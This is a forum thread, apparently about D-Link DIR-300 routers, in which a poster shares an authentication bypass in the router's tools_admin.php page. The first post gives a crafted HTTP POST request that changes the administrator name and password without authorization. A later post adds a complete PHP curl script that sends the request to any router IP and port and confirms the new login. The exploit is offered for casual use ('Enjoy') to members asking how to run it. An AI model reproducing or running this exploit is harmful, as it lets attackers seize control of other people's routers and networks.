![]() |
|
Computers & Information Technologies « Everything related to computers and internet. » |
![]() |
|
Share | Thread Tools | Search this Thread |
![]() |
#1 |
Last Online: 05-30-2013
Join Date: Jan 2008
Posts: 1,788
Thanks: 10,018
Thanked 1,100 Times in 651 Posts
Groans: 1
Groaned at 6 Times in 6 Posts
|
![]()
Control panel script - tools_admin.php allows attacker to change
administrator name, password and other variables without any authorization by sending specially crafted http post request such as: ---cut here--- POST http://192.168.1.1:80/tools_admin.php HTTP/1.1 Host: 192.168.1.2 Keep-Alive: 115 Content-Type: application/x-www-form-urlencoded Content-length: 0 ACTION_POST=LOGIN&LOGIN_USER=a&LOGIN_PASSWD=b&logi n=+Log+In+&NO_NEED_AUTH=1&AUTH_GROUP=0&admin_name= admin&admin_password1=uhOHahEh ---cut here--- Enjoy ![]()
__________________
|
![]() |
![]() |
![]() |
#2 |
Registered Member
Last Online: 04-10-2012
Join Date: May 2006
Posts: 16
Thanks: 0
Thanked 3 Times in 3 Posts
Groans: 0
Groaned at 0 Times in 0 Posts
|
![]()
hey thanks for the post !
byut how to use it ? where to save it ? to what extension ? |
![]() |
![]() |
![]() |
#3 | |
Last Online: 05-30-2013
Join Date: Jan 2008
Posts: 1,788
Thanks: 10,018
Thanked 1,100 Times in 651 Posts
Groans: 1
Groaned at 6 Times in 6 Posts
|
![]() Quote:
Code:
<?php if(sizeof($argv)!=4) { echo "Usage: php5 $argv[0] <router ip addres> <port> <admin password>\n"; exit; } $ch=curl_init(); curl_setopt($ch, CURLOPT_URL, "http://".$argv[1]."/tools_admin.php"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_PORT, $argv[2]); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS,"ACTION_POST=LOGIN&LOGIN_USER=a&LOGIN_PASSWD=b&login=+Log+In+&NO_NEED_AUTH=1&AUTH_GROUP=0&admin_name=admin&admin_password1=".urlencode($argv[3])); echo "+ starting request\n"; $out = curl_exec($ch); if($out===false) { echo "- Error: could not connect ( http://$argv[1]:$argv[2]/tools_admin.php).\n"; exit; } else echo "+ request sended\n"; curl_close($ch); if(stripos($out,"login.php")===true) { echo "- something goes wrong (check answer - answer.html) !\n"; $f=fopen("answer.html","w"); fwrite($f,$out); fclose($f); exit; } else echo "+ ok, now you can login using l: admin p:$argv[3]\n"; ?>
__________________
|
|
![]() |
![]() |
![]() |
#4 |
Registered Member
Last Online: 04-28-2013
Join Date: Apr 2006
Posts: 357
Thanks: 4
Thanked 10 Times in 10 Posts
Groans: 0
Groaned at 0 Times in 0 Posts
|
![]()
can you do that please?
|
![]() |
![]() |
![]() |
#5 |
Last Online: 05-30-2013
Join Date: Jan 2008
Posts: 1,788
Thanks: 10,018
Thanked 1,100 Times in 651 Posts
Groans: 1
Groaned at 6 Times in 6 Posts
|
![]()
__________________
|
![]() |
![]() |
The Following User Says Thank You to Google For This Useful Post: |
![]() |
|
Tags |
change, dir300, dlink, password, routers |
Currently Active Users Viewing This Thread: 1 (0 members and 1 guests) | |
Thread Tools | Search this Thread |
|
|